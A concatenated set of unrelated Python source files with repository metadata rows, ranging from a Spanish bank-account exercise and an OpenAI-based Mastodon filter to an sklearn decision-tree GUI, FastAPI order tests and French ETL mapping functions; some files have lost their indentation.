# print("Tipo de dato 2: ", type(contenidoBalanceCuentaLeer))
self.balance = balance_int
# print(type(self.balance))
BalanceCuentaLeer.close()
def __str__(self):
return f"Cliente: { self.nombre } { self.apellido }\nNumero de Cuenta: { self.numero_cuenta }\nBalance: ${ self.balance }"
def depositar(self, monto_deposito):
self.balance += monto_deposito
ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
archivoRegistroTransacciones = open(ruta_depositar, "a")
archivoRegistroTransacciones.write(f"{ monto_deposito } - INGRESO\n")
archivoRegistroTransacciones.close()
# Path.write_text(ruta_depositar, str(monto_deposito)) error, ya que no haria salto de linea \n
Path.write_text(ruta_balance, str(self.balance))
print("Deposito Aceptado")
def retirar(self, monto_retiro):
if self.balance >= monto_retiro:
self.balance -= monto_retiro
ruta_depositar = Path(mi_ruta, 'RegistroTransacciones.txt')
ruta_balance = Path(mi_ruta, 'BalanceCuenta.txt')
archivoRegistroTransacciones = open(ruta_depositar, "a")
archivoRegistroTransacciones.write(f"{monto_retiro} - RETIRO\n")
archivoRegistroTransacciones.close()
Path.write_text(ruta_balance, str(self.balance))
print("Retiro Realizado")
else:
print("Fondos Insuficientes Para el Retiro")
def crear_cliente():
nombre_cl = input("Ingrese su Nombre: ")
apellido_cl = input("Ingrese su Apellido: ")
numero_cuenta = input("Ingrese Su Numero de Cuenta: ")
cliente = Cliente(nombre_cl, apellido_cl, numero_cuenta) # class Cliente
return cliente
def inicio():
mi_cliente = crear_cliente()
print(mi_cliente) # f"Cliente: { self.nombre } { self.apellido }\nNumero de Cuenta: { self.numero_cuenta }\nBalance: { self.balance }"
opcion = 0
while opcion != 'S': # 'S' salir
print('Elija: Depositar (D), Retirar (R), Salir (S)')
opcion = input()
if opcion == 'D':
monto_dep = int(input("Monto a Depositar: $"))
mi_cliente.depositar(monto_dep)
elif opcion == 'R':
monto_dep = int(input("Monto a Retirar: $"))
mi_cliente.retirar(monto_dep)
print(mi_cliente) # mostrar como queda cliente despues de esas operaciones
print("Gracias Por Su Visita - Hasta Luego")
inicio()
# proyecto: https://www.udemy.com/course/python-total/learn/lecture/28747292#questions
# convertir str a int: https://www.freecodecamp.org/news/python-convert-string-to-int-how-to-cast-a-string-in-python/#:~:text=To%20convert%2C%20or%20cast%2C%20a,int(%22str%22)%20.
# convertir int a str: https://es.stackoverflow.com/questions/364966/como-convertir-un-dato-int-a-string-en-python
| Alexa-Silvermoon/curso-python-proyectos-udemy-federico | Dia7/ProyectoDelDia7 - mejorada cuenta bancaria.py | ProyectoDelDia7 - mejorada cuenta bancaria.py | py | 3,868 | python | es | code | 0 | github-code | 36 |
10022682639 | import os
import re
import openai
from dotenv import load_dotenv
load_dotenv()
openai.api_key = os.environ['OPENAI_API_KEY']
def request_chatgpt(messages: list):
return openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=messages,
)
def analyze_toots(mastodon_timelines: list) -> tuple[list[int], str]:
message_content = ''.join([f"id={toot.id} - {re.sub(re.compile('<.*?>'), '', toot.content)}\n" for toot in mastodon_timelines])
response = request_chatgpt(
messages=[
{"role": "user", "content": message_content},
{
"role": "system",
"content": """
You are a professional analyst.
Please output `id list of statements about programming` based on the following constraints and input statements.
# Constraints
- Output no more than 20 IDs.
- Use this format for output : `{id}, {id}, {id}, {id}, {id}`
I'll send you the input data.
""",
},
]
)["choices"][0]["message"]["content"]
relevant_toot_ids = [int(re.sub(r"\D", "", id)) for id in response.split(',') if re.search(r"\d", id)]
return relevant_toot_ids, response
| mio256/mastardon | page/chatgpt_func.py | chatgpt_func.py | py | 1,302 | python | en | code | 1 | github-code | 36 |
25236999928 | def count_substrings(string1, string2):
''' Get the number of subsctrings in two strings
'''
answer = 0
for i in range(len(string1)):
result = ''
for j in range(i, len(string1)):
result += string1[j]
if string2.find(result) != -1:
answer += 1
return answer
print(count_substrings('aab', 'aaaab'))
print(count_substrings('duke', 'duke lester is here'))
| dukelester/geek_for_geek_DSA | strings_dsa.py | strings_dsa.py | py | 428 | python | en | code | 0 | github-code | 36 |
7863927981 | #!/usr/bin/env python3
names= ["thiago",
"joao",
"rafael",
"Rafaela",
"ronaldo",
"joana"]
## estilo funcional
print(*list(filter(lambda nome: nome[0].lower() == "r", names)),sep="\n")
print()
## estilo imperativo
def comeca_b(texto):
return texto[0].lower() == "r"
filtro= filter(comeca_b,names)
filtro= list(filtro)
for i in filtro:
print(i)
| ThiagoRBM/python-base | composicao.py | composicao.py | py | 396 | python | pt | code | 0 | github-code | 36 |
2286638164 | from collections import Counter
def get_hints(word: str, secret_word: str):
word = word.lower()
result = [""] * len(word)
missing_indexes = []
secrect_counter = Counter(secret_word)
for idx, c in enumerate(word):
if c == secret_word[idx]:
result[idx] = "green"
secrect_counter[c] -= 1
else:
missing_indexes.append(idx)
for idx in missing_indexes:
c = word[idx]
if c in secrect_counter and secrect_counter[c] > 0:
result[idx] = "yellow"
secrect_counter[c] -= 1
else:
result[idx] = "black"
if word == secret_word:
return result
else:
return result
| pythonfoo/rest-wordle | rest_wordle/utils.py | utils.py | py | 712 | python | en | code | 0 | github-code | 36 |
9211558964 | import sys
import os
import time
import traceback
import pandas as pd
import seaborn as sns
import pydotplus
import matplotlib.pyplot as plt
import numpy as np
from sklearn.tree import export_graphviz
from sklearn import tree
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
from sklearn import datasets
from sklearn.utils import shuffle
from sklearn.metrics import mean_squared_error
from sklearn.metrics import confusion_matrix, classification_report
sys.path.append('../')
from SOL4Py.ZApplicationView import *
from SOL4Py.ZLabeledComboBox import *
from SOL4Py.ZPushButton import *
from SOL4Py.ZVerticalPane import *
from SOL4Py.ZTabbedWindow import *
from SOL4Py.ZMLModel import *
from SOL4Py.ZScalableScrolledFigureView import *
from SOL4Py.ZScalableScrolledDecisionTreeView import*
Iris = 0
Digits = 1
Wine = 2
BreastCancer = 3
############################################################
# Classifier Model class
class DecisionTreeClassifierModel(ZMLModel):
##
# Constructor
def __init__(self, dataset_id, mainv):
super(DecisionTreeClassifierModel, self).__init__(dataset_id, mainv)
def run(self):
self.write("====================================")
self._start(self.run.__name__)
try:
# 1 Load dataset
self.load_dataset()
# 2 Load or create model
if self.trained():
# 2.1 if trained, load a trained model pkl file
self.load()
else:
# 2.2 else create a model, and train and save it
self.build()
self.train()
self.save()
# 3 Predict for test_data
self.predict()
# 4 Visualize the prediction
self.visualize()
except:
traceback.print_exc()
self._end(self.run.__name__ )
def load_dataset(self):
self._start(self.load_dataset.__name__ )
if self.dataset_id == Iris:
self.dataset= datasets.load_iris()
self.write("loaded iris dataset")
if self.dataset_id == Digits:
self.dataset= datasets.load_digits()
self.write("loaded Digits dataset")
if self.dataset_id == Wine:
self.dataset= datasets.load_wine()
self.write("loaded Wine dataset")
if self.dataset_id == BreastCancer:
self.dataset= datasets.load_breast_cancer()
self.write("loaded BreastCancer dataset")
attr = dir(self.dataset)
self.write("dir:" + str(attr))
if "feature_names" in attr:
self.write("feature_names:" + str(self.dataset.feature_names))
if "target_names" in attr:
self.write("target_names:" + str(self.dataset.target_names))
self.set_model_filename()
self.view.description.setText(self.dataset.DESCR)
X, y = self.dataset.data, self.dataset.target
self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(X, y, test_size=0.3, random_state=42)
self._end(self.load_dataset.__name__)
def build(self):
self._start(self.build.__name__)
self.model = tree.DecisionTreeClassifier(random_state=0)
self._end(self.build.__name__)
def train(self):
self._start(self.train.__name__)
start = time.time()
params = {'max_depth':range(3,20)}
grid_search = GridSearchCV(self.model, param_grid=params, n_jobs=4)
grid_search.fit(self.X_train, self.y_train)
self.write("GridSearch BestParams " + str(grid_search.best_params_) )
self.write("GridSearch BestScore " + str(grid_search.best_score_))
self.model = tree.DecisionTreeClassifier(**grid_search.best_params_)
# Class fit method of the classifier
self.model.fit(self.X_train, self.y_train)
elapsed_time = time.time() - start
elapsed = str("Train elapsed_time:{0}".format(elapsed_time) + "[sec]")
self.write(elapsed)
self._end(self.train.__name__)
def predict(self):
self._start(self.predict.__name__)
self.pred_test = self.model.predict(self.X_test)
report = str (classification_report(self.y_test, self.pred_test) )
self.write(report)
self._end(self.predict.__name__)
def visualize(self):
cmatrix = confusion_matrix(self.y_test, self.pred_test)
self.view.visualize(cmatrix, self.model)
############################################################
# Classifier View
class MainView(ZApplicationView):
# Class variables
# ClassifierView Constructor
def __init__(self, title, x, y, width, height):
super(MainView, self).__init__(title, x, y, width, height)
self.font = QFont("Arial", 10)
self.setFont(self.font)
# 1 Add a labeled combobox to top dock area
self.add_datasets_combobox()
# 2 Add a textedit to the left pane of the center area.
self.text_editor = QTextEdit()
self.text_editor.setLineWrapColumnOrWidth(600)
self.text_editor.setLineWrapMode(QTextEdit.FixedPixelWidth)
# 3 Add a tabbed_window to the right pane of the center area.
self.tabbed_window = ZTabbedWindow(self, 0, 0, width/2, height)
# 4 Add a description text edit.
self.description = QTextEdit()
self.description.setLineWrapColumnOrWidth(600)
self.description.setLineWrapMode(QTextEdit.FixedPixelWidth)
# 5 Add a figure_view to the right pane of the center area.
self.figure_view = ZScalableScrolledFigureView(self, 0, 0, width/2, height)
# 6 Add a figure_view to the right pane of the center area.
self.tree_view = ZScalableScrolledDecisionTreeView(self, 0, 0, width/2, height)
self.add(self.text_editor)
self.add(self.tabbed_window)
self.tabbed_window.add("Description", self.description)
self.tabbed_window.add("ConfusionMatrix", self.figure_view)
self.tabbed_window.add("DecisionTree", self.tree_view)
self.figure_view.hide()
self.tree_view.hide()
self.show()
def add_datasets_combobox(self):
self.dataset_id = Iris
self.datasets_combobox = ZLabeledComboBox(self, "Datasets", Qt.Horizontal)
# We use the following datasets of sklearn to test DecisionTreeClassifier.
self.datasets = {"Iris": Iris, "Digits": Digits, "Wine": Wine, "BreastCancer": BreastCancer}
title = self.get_title()
self.setWindowTitle( "Iris" + " - " + title)
self.datasets_combobox.add_items(self.datasets.keys())
self.datasets_combobox.add_activated_callback(self.datasets_activated)
self.datasets_combobox.set_current_text(self.dataset_id)
self.start_button = ZPushButton("Start", self)
self.clear_button = ZPushButton("Clear", self)
self.start_button.add_activated_callback(self.start_button_activated)
self.clear_button.add_activated_callback(self.clear_button_activated)
self.datasets_combobox.add(self.start_button)
self.datasets_combobox.add(self.clear_button)
self.set_top_dock(self.datasets_combobox)
def write(self, text):
self.text_editor.append(text)
self.text_editor.repaint()
def datasets_activated(self, text):
self.dataset_id = self.datasets[text]
title = self.get_title()
self.setWindowTitle(text + " - " + title)
def start_button_activated(self, text):
self.model = DecisionTreeClassifierModel(self.dataset_id, self)
self.start_button.setEnabled(False)
self.clear_button.setEnabled(False)
try:
self.model.run()
except:
pass
self.start_button.setEnabled(True)
self.clear_button.setEnabled(True)
def clear_button_activated(self, text):
self.text_editor.setText("")
self.description.setText("")
self.figure_view.hide()
self.tree_view.hide()
if plt.gcf() != None:
plt.close()
def visualize(self, cmatrix, tree):
# 1 Show figure view
self.figure_view.show()
if plt.gcf() != None:
plt.close()
sns.set()
df = pd.DataFrame(cmatrix)
sns.heatmap(df, annot=True, fmt="d")
self.figure_view.set_figure(plt)
# 2 Show tree view
self.tree_view.show()
feature_names = None
try:
feature_names = tree.dataset.feature_names
except:
pass
target_names = None
try:
target_names = tree.dataset.target_names
except:
pass
self.tree_view.set_tree(tree, feature_names, target_names)
############################################################
#
if main(__name__):
try:
app_name = os.path.basename(sys.argv[0])
applet = QApplication(sys.argv)
main_view = MainView(app_name, 40, 40, 1000, 500)
main_view.show ()
applet.exec_()
except:
traceback.print_exc()
| sarah-antillia/SOL4Py_V4 | ml/DecisionTreeClassifier.py | DecisionTreeClassifier.py | py | 8,676 | python | en | code | 0 | github-code | 36 |
70874377705 | from decimal import Decimal
from random import random
from unittest.mock import ANY, Mock
from uuid import UUID, uuid4
from fastapi import FastAPI
from injector import InstanceProvider
from mockito import when
from pytest import fixture, mark
from currency import Currency
from ordering import Service as OrderingService
from ordering import commands, errors
from ordering.queries import BuyOrdersQueries
from tests.ordering.factories import BuyOrderFactory as BuyOrder
from .factories import ApiCreateBuyOrderRequestFactory as CreateBuyOrder
CREATE_ORDER_URL = "/orders/"
class TestCreateBuyOrderRequest:
def test_after_creating_redirects_to_created_order(self, api_client):
request = CreateBuyOrder()
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 201
order_url = response.headers["Location"]
order = api_client.get(order_url).json()
assert order["request_id"] == request["request_id"]
def test_creating_order_is_idempotent(self, api_client):
request = CreateBuyOrder()
first = api_client.post(CREATE_ORDER_URL, json=request)
second = api_client.post(CREATE_ORDER_URL, json=request)
assert first.headers["Location"] == second.headers["Location"]
@mark.parametrize(
"request_id", ["ILLEGAL", uuid4().hex[:-3], "", random(), None]
)
def test_reject_when_no_uuid_id(self, api_client, request_id):
request = CreateBuyOrder().update(request_id=request_id)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
def test_reject_when_negative_amount(self, api_client):
request = CreateBuyOrder().update(amount=-1)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
def test_reject_when_amount_higher_than_1_000_000_000(self, api_client):
request = CreateBuyOrder().update(amount=1_000_000_000)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
@mark.parametrize("currency", ["PLN", "AUD", "XXX"])
def test_reject_when_currency_not_eur_gbp_usd(self, api_client, currency):
request = CreateBuyOrder().update(currency=currency)
response = api_client.post(CREATE_ORDER_URL, json=request)
assert response.status_code == 422
class TestCreateBuyOrderController:
def test_201_when_created(
self, app, api_client, create_buy_order, order_url,
):
response = api_client.post(CREATE_ORDER_URL, json=create_buy_order)
assert response.status_code == 201
assert response.headers["Location"] == order_url
def test_301_when_already_created(
self, api_client, ordering, order_id, order_url,
):
when(ordering).create_buy_order(...).thenRaise(
errors.OrderAlreadyExists(order_id)
)
response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
assert response.status_code == 301
assert response.headers["Location"] == order_url
def test_409_when_order_limit_exceeded(self, api_client, ordering):
when(ordering).create_buy_order(...).thenRaise(
errors.BalanceLimitExceeded(Decimal(100))
)
response = api_client.post(CREATE_ORDER_URL, json=CreateBuyOrder())
assert response.status_code == 409
assert response.json()["detail"] == "Exceeded 100BTC ordering limit"
@fixture
def create_buy_order(self) -> dict:
return CreateBuyOrder()
@fixture
def order_id(self) -> UUID:
return uuid4()
@fixture
def order_url(self, app: FastAPI, order_id: UUID) -> str:
return app.url_path_for("orders:get_order", order_id=str(order_id))
@fixture(autouse=True)
def ordering(
self, container, create_buy_order, order_id,
) -> OrderingService:
service = Mock(spec=OrderingService)
container.binder.bind(OrderingService, to=InstanceProvider(service))
queries = Mock(spec=BuyOrdersQueries)
container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
request_id = UUID(hex=create_buy_order["request_id"])
when(queries).get_order_id(request_id).thenReturn(order_id)
when(service).create_buy_order(
commands.CreateBuyOrder.construct(
id=request_id,
amount=(
Decimal(create_buy_order["amount"])
.quantize(Decimal(10) ** -4)
),
currency=Currency[create_buy_order["currency"]],
timestamp=ANY,
)
).thenReturn(order_id)
return service
class TestGetBuyOrderController:
def test_404_when_no_order(self, api_client):
response = api_client.get(f"/orders/{uuid4()}")
assert response.status_code == 404
def test_order_data_when_order_exists(self, api_client, order):
response = api_client.get(f"/orders/{order.id}")
assert response.json() == {
"id": str(order.id),
"request_id": str(order.request_id),
"bitcoins": float(order.bitcoins),
"bought_for": float(order.bought_for),
"currency": order.currency.name,
}
@fixture
def order(self) -> BuyOrder:
return BuyOrder()
@fixture(autouse=True)
def queries(self, container, order) -> BuyOrdersQueries:
queries = Mock(BuyOrdersQueries)
when(queries).get_order(...).thenReturn(None)
when(queries).get_order(order.id).thenReturn(order)
container.binder.bind(BuyOrdersQueries, to=InstanceProvider(queries))
return queries
| lzukowski/workflow | tests/application/test_api.py | test_api.py | py | 5,764 | python | en | code | 5 | github-code | 36 |
28834678402 | # -*- coding: utf-8 -*-
"""
Created on Fri Dec 11 14:34:04 2015
@author: 89965
fonctions de structurelles diverses
"""
import os
import re
import logging
import subprocess
from collections import defaultdict
import psutil
import pyetl.formats.formats as F
import pyetl.formats.mdbaccess as DB
from .outils import charge_mapping, remap, prepare_elmap, renseigne_attributs_batch
LOGGER = logging.getLogger('pyetl')
def map_struct(regle):
"""mappe la structure clef etrangeres et fonctions"""
charge_mapping(regle, mapping=regle.schema.mapping)
def _map_schemas(regle, obj):
'''essaye de trouver un mapping pour une classe'''
if obj is None:
if regle.getvar("schema_entree"):
schema_origine = regle.stock_param.schemas[regle.getvar("schema_entree")]
print('-------------------------mapping', schema_origine)
# else:
# return
# if regle.params.val_entree.val:
# schema2 = regle.stock_param.init_schema(regle.params.val_entree.val,
# modele=schema_origine, origine='B')
# else:
return
else:
schema_origine = obj.schema.schema
if regle.params.val_entree.val:
schema2 = regle.stock_param.init_schema(regle.params.val_entree.val,
modele=schema_origine, origine='B')
else:
schema2 = obj.schema.schema
regle.schema = schema2
if schema2.elements_specifiques:
for i in schema2.elements_specifiques:
# print('mapping specifique', i)
spec = schema2.elements_specifiques[i]
mapped = remap(spec, regle.elmap)
# print('mapping specifique', i, len(spec), '->', len(mapped))
schema2.elements_specifiques[i] = mapped
else:
LOGGER.info("pas d'elements specifiques")
# print("-----------------------------pas d'elements specifiques")
for i in schema_origine.classes:
schema2.get_classe(i, modele=schema_origine.classes[i], cree=True)
for i in list(schema_origine.classes.keys()):
# print ('map_schemas ',schema_origine.nom,i,regle.mapping.get(i))
if i in regle.mapping:
schema2.renomme_classe(i, regle.mapping[i])
# mapping foreign keys :
# print("mapping effectue", len(schema2.classes))
for clef in schema2.classes:
if clef in regle.mapping_attributs:
for orig, dest in regle.mapping_attributs[clef].items():
schema2.classes[clef].rename_attribut(orig, dest)
def applique_mapping(regle):
"""gere les clefs etrangeres et les elements speciaux dans les mappings"""
mapping = regle.schema.mapping
regle.elmap = prepare_elmap(mapping)
_map_schemas(regle, None)
regle.nbstock = 0
for i in mapping:
for scl in regle.schema.classes.values():
scl.renomme_cible_classe(i, mapping[i])
def h_map2(regle):
""" prepare le mapping des structures"""
regle.store = True
regle.blocksize = 1
regle.nbstock = 0
regle.traite_stock = applique_mapping
def f_map2(regle, obj):
'''#aide||mapping en fonction d'une creation dynamique de schema
#aide_spec||parametres: mappe les structures particulieres
#pattern2||;;;map;=#struct;;
'''
regle.schema = obj.schema.schema
regle.nbstock = 1
def h_map(regle):
''' precharge le fichier de mapping et prepare les dictionnaires'''
regle.dynlevel = 0 # les noms de mapping dependent ils des donnees d entree
regle.mapping = None
regle.schema = None
# if regle.params.att_sortie.val == '#schema': # mapping d un schema existant
# schema2 =
regle.changeschema = True
fich = regle.params.cmp1.val
if "[F]" in fich:
regle.dynlevel = 2
elif "[C]" in fich:
regle.dynlevel = 1
if regle.dynlevel:
regle.clefdyn = ""
else:
charge_mapping(regle)
_map_schemas(regle, None)
def f_map(regle, obj):
'''#aide||mapping en fonction d'un fichier
#aide_spec||parametres: map; nom du fichier de mapping
#aide_spec2||si #schema est indique les objets changent de schema
#pattern||?=#schema;?C;;map;C;;
#test||obj||^#schema;test;;map;%testrep%/refdata/map.csv;;||atv;toto;A
#test2||obj||^#schema;test;;map+-;%testrep%/refdata/map.csv;;||cnt;2
'''
# print ("dans map ===============",obj)
if regle.dynlevel: # attention la regle est dynamique
clef_dyn = regle.stock_param.chemin_courant if regle.dynlevel == 1\
else regle.stock_param.fichier_courant
if clef_dyn != regle.clef_dyn:
charge_mapping(regle)
if not regle.schema:
_map_schemas(regle, obj)
clef = obj.ident
schema2 = regle.schema
if clef in regle.mapping:
nouv = regle.mapping.get(clef)
obj.setident(nouv, schema2=schema2)
if clef in regle.mapping_attributs:
for orig, dest in regle.mapping_attributs[clef].items():
try:
obj.attributs[dest] = obj.attributs[orig]
del obj.attributs[orig]
except KeyError:
obj.attributs[dest] = ''
return True
# print ('====================== mapping non trouve', clef)
# print ('definition mapping', '\n'.join([str(i)+':\t\t'+str(regle.mapping[i])
# for i in sorted(regle.mapping)]))
return False
def store_traite_stock(regle):
''' relache les objets '''
store = regle.tmpstore
reverse = regle.params.cmp2.val == 'rsort'
# print ("tri inverse ",reverse)
if isinstance(store, list):
if regle.params.cmp2.val:
keyval = lambda obj: "|".join(obj.attributs.get(i, '')
for i in regle.params.att_entree.liste)
store.sort(key=keyval, reverse=reverse)
for obj in store:
# print ('store: relecture objet ', obj, obj.schema.identclasse,obj.schema.info)
regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["end:"])
else:
for clef in sorted(store.keys(), reverse=reverse) if regle.params.cmp2.val else store:
obj = store[clef]
regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["end:"])
h_stocke(regle) # on reinitialise
def h_stocke(regle):
'''marque la regle comme stockante'''
# print ('stockage tmpstore ', regle.params.att_entree.liste)
regle.store = True
regle.stocke_obj = True # on stocke les objets et pas que la clef
regle.nbstock = 0
regle.traite_stock = store_traite_stock
regle.tmpstore = dict() if regle.params.cmp1.val else list()
# mode comparaison : le stock est reutilise ailleurs (direct_reuse)=False
regle.direct_reuse = not 'cmp' in regle.params.cmp1.val
regle.fold = regle.params.cmp1.val == 'cmpf'
if regle.params.cmp2.val == 'clef':
regle.stocke_obj = False
regle.tmpstore = set()
def f_stocke(regle, obj):
'''#aide||stockage temporaire d'objets pour assurer l'ordre dans les fichiers de sortie
#aide_spec||liste de clefs,tmpstore;uniq;sort|rsort : stockage avec option de tri
#aide_spec2||liste de clefs,tmpstore;cmp;nom : prechargement pour comparaisons
#pattern1||;;?L;tmpstore;?=uniq;?=sort;||
#pattern2||;;?L;tmpstore;?=uniq;?=rsort;||
#pattern3||;;?L;tmpstore;=cmp;A;?=clef||
#pattern4||;;?L;tmpstore;=cmpf;A;?=clef||
#test||obj;point;4||^;;V0;tmpstore;uniq;rsort||^;;C1;unique||atv;V0;3;
#test2||obj;point;4||^V2;;;cnt;-1;4;||^;;V2;tmpstore;uniq;sort||^;;C1;unique;||atv;V2;1;
'''
# regle.stock.append(obj)
if obj.virtuel:
return True
if regle.direct_reuse:
regle.nbstock += 1
if regle.params.cmp1.val:
if len(regle.params.att_entree.liste) > 1:
clef = "|".join(obj.attributs.get(i, '') for i in regle.params.att_entree.liste)
else:
clef = obj.attributs.get(regle.params.att_entree.val, '')
if regle.stocke_obj:
regle.tmpstore[clef] = obj
else:
regle.tmpstore.add(obj)
return True
# print ('store: stockage objet ', obj, obj.schema.identclasse,obj.schema.info)
regle.tmpstore.append(obj)
return True
def h_uniq(regle):
''' stocke les clefs pour l'unicite '''
regle.tmpstore = set()
def f_uniq(regle, obj):
'''#aide||unicite de la sortie laisse passer le premier objet et filtre le reste
#aide_spec||liste des attibuts devant etre uniques si #geom : test geometrique
#pattern||;?=#geom;?L;unique;;;
#test||obj;point;2||^;;C1;unique||+fail:;;;;;;;pass>;;||cnt;1
#test2||obj;point;2||^;;C1;unique-||cnt;1
#test3||obj;point;2||^;#geom;;unique-||cnt;1
#test4||obj;point;2||^;#geom;C1;unique-||cnt;1
'''
# regle.stock.append(obj)
clef = str(tuple(tuple(i) for i in obj.geom_v.coords))\
if regle.params.val_entree.val == '#geom' else ''
clef = clef + "|".join(obj.attributs.get(i, '') for i in regle.params.att_entree.liste)
# print ('uniq ',clef, regle.params.att_entree.val )
if clef in regle.tmpstore:
return False
regle.tmpstore.add(clef)
return True
def h_uniqcnt(regle):
''' stocke les clefs pour l'unicite '''
regle.maxobj = regle.params.cmp1.num if regle.params.cmp1.num else 1
regle.cnt = regle.maxobj > 1
regle.tmpstore = defaultdict(int)
def f_uniqcnt(regle, obj):
'''#aide||unicite de la sortie laisse passer les N premiers objet et filtre le reste
#pattern||A;?=#geom;?L;unique;?N;||sortie
#schema||ajout_attribut
#test||obj;point;4||^X;;C1;unique;2;||+fail:;;;;;;;pass>;;||cnt;2
#test2||obj;point;4||^X;;C1;unique-;2;||cnt;2
#test3||obj;point;4||^X;#geom;;unique-;2;||cnt;2
#test4||obj;point;4||^X;#geom;C1;unique-;2;||cnt;2
#test4||obj;point;4||V0;1;;;V0;2;;set;;;||^X;#geom;V0;unique>;1;;||cnt;1
'''
# regle.stock.append(obj)
clef = str(tuple(tuple(i) for i in obj.geom_v.coords))\
if regle.params.val_entree.val == '#geom' else ''
clef = clef + "|".join(obj.attributs.get(i, '') for i in regle.params.att_entree.liste)
regle.tmpstore[clef] += 1
obj.attributs[regle.params.att_sortie.val] = str(regle.tmpstore[clef])
if regle.tmpstore[clef] > regle.maxobj:
return False
return True
def sortir_traite_stock(regle):
'''ecriture finale'''
print('traite stock sortir', regle.final)
if regle.final:
regle.f_sortie.ecrire_objets(regle, True)
regle.nbstock = 0
return
for groupe in list(regle.stockage.keys()):
for obj in regle.recup_objets(groupe):
regle.f_sortie.ecrire_objets_stream(obj, regle, False)
regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["end:"])
regle.nbstock = 0
def h_sortir(regle):
'''preparation sortie'''
if regle.params.att_sortie.val == "#schema": # on force les noms de schema pour l'ecriture
regle.nom_fich_schema = regle.params.val_entree.val
else:
regle.nom_fich_schema = regle.params.cmp2.val
regle.nom_base = os.path.basename(regle.params.cmp2.val
if regle.params.cmp2.val else regle.nom_fich_schema)
if regle.debug:
print("nom de schema ", regle.nom_fich_schema)
if '[' in regle.params.cmp1.val: # on a defini un fanout
tmplist = regle.params.cmp1.val.find('[')
#print("valeur ii ", regle.params.cmp1,ii)
regle.setvar("fanout", regle.params.cmp1.val[tmplist+1:-1])
regle.params.cmp1.val = regle.params.cmp1.val[:tmplist]
regle.f_sortie = F.Writer(regle.params.cmp1.val) # tout le reste
# print ('positionnement writer ',regle, regle.params.cmp1.val)
if regle.f_sortie.nom_format == 'sql': # gestion des dialectes sql et du mode connecté
destination = regle.f_sortie.writerparms.get('destination')
dialecte = regle.f_sortie.writerparms.get('dialecte')
regle.f_sortie.writerparms['reinit'] = regle.getvar('reinit')
regle.f_sortie.writerparms['nodata'] = regle.getvar('nodata')
if destination: # on va essayer de se connecter
connection = DB.dbaccess(regle.stock_param, destination)
if connection.valide:
regle.f_sortie.gensql = connection.gensql # la on a une instance connectee
elif dialecte:
regle.f_sortie.gensql = dialecte.gensql()
# print ('sortie',regle.ligne,regle.f_sortie.writerparms)
elif regle.f_sortie.nom_format == 'file': #gestion de fichiers de texte generiques
dialecte = regle.f_sortie.writerparms.get('dialecte')
regle.ext = dialecte
if regle.params.cmp2.val and regle.params.cmp2.val != "#print":
rep_base = regle.getvar('_sortie', loc=0)
# print('positionnement sortie', rep_base, os.path.join(rep_base, regle.params.cmp2.val))
regle.setvar('_sortie', os.path.join(rep_base, regle.params.cmp2.val), loc=1)
regle.fanout = regle.getvar("fanout", 'groupe')\
if regle.f_sortie.multiclasse else 'classe'
# print("fanout de sortie",regle.fanout)
regle.calcule_schema = regle.f_sortie.calcule_schema
regle.memlimit = int(regle.getvar('memlimit', 0))
regle.store = None
regle.nbstock = 0
regle.traite_stock = sortir_traite_stock
# regle.liste_attributs = regle.params.att_entree.liste
if regle.stock_param.debug:
print('sortir :', regle.params.att_entree.liste)
regle.final = True
regle.menage = True
#print ('icsv: sortir copy:',regle.copy,'stream:',regle.stock_param.stream)
if regle.copy and regle.getvar("mode_sortie", "A") == "D":
# cette regle consomme les objets sauf si on est en mode copie et streaming
regle.final = False
regle.copy = False
regle.valide = True
# print ('fin preparation sortie ',regle.f_sortie.writerparms)
def setschemasortie(regle, obj):
'''positionne le schema de sortie pour l objet '''
if regle.nom_fich_schema:# on copie le schema pour ne plus le modifier apres ecriture
regle.change_schema_nom(obj, regle.nom_fich_schema)
if obj.schema and obj.schema.amodifier(regle):
obj.schema.setsortie(regle.f_sortie, os.path.join(regle.getvar('_sortie'),
os.path.dirname(regle.params.cmp1.val)))
obj.schema.setminmaj(regle.f_sortie.minmaj)
if regle.params.att_entree.liste:
obj.liste_atttributs = regle.params.att_entree.liste
def f_sortir(regle, obj):
'''#aide||sortir dans differents formats
#aide_spec||parametres:?(#schema;nom_schema);?liste_attributs;sortir;format[fanout]?;?nom
#pattern||?=#schema;?C;?L;sortir;?C;?C||sortie
#test||redirect||obj||^Z;ok;;set||^;;;sortir;csv;#print||end
'''
if obj.virtuel: # on ne traite pas les virtuels
return True
listeref = obj.liste_attributs
schemaclasse_ref = obj.schema
setschemasortie(regle, obj)
if regle.store is None: # on decide si la regle est stockante ou pas
regle.store = regle.f_sortie.calcule_schema and\
(not obj.schema or not obj.schema.stable)
if regle.store: # on ajuste les branchements
regle.setstore()
if regle.store:
regle.nbstock += 1
groupe = obj.attributs["#groupe"]
# print("stockage", obj.ido, groupe, regle)
if groupe != "#poubelle":
nom_base = regle.nom_base
#regle.stock_param.nb_obj+=1
if regle.stock_param.stream: #sortie classe par classe
if groupe not in regle.stockage:
regle.f_sortie.ecrire_objets(regle, False) # on sort le groupe precedent
regle.compt_stock = 0
regle.endstore(nom_base, groupe, obj, regle.final,
geomwriter=regle.f_sortie.tmp_geom, nomgeom=regle.f_sortie.nom_fgeo)
return True
regle.f_sortie.ecrire_objets_stream(obj, regle, False)
obj.schema = None
if regle.final:
return True
# la on regenere l'objet et on l'envoie dans le circuit poutr la suite
obj.setschema(schemaclasse_ref)
obj.liste_attributs = listeref
# on reattribue le schema pour la sortie en simulant une copie
return True
def valreplace(chaine, obj):
'''remplace les elements provenant de l objet '''
vdef = r'\[(#?[a-zA-Z_][a-zA-Z0-9_]*)\]'
repl = lambda x: obj.attributs.get(x.group(1), '')
return re.sub(vdef, repl, chaine)
def preload(regle, obj):
'''prechargement'''
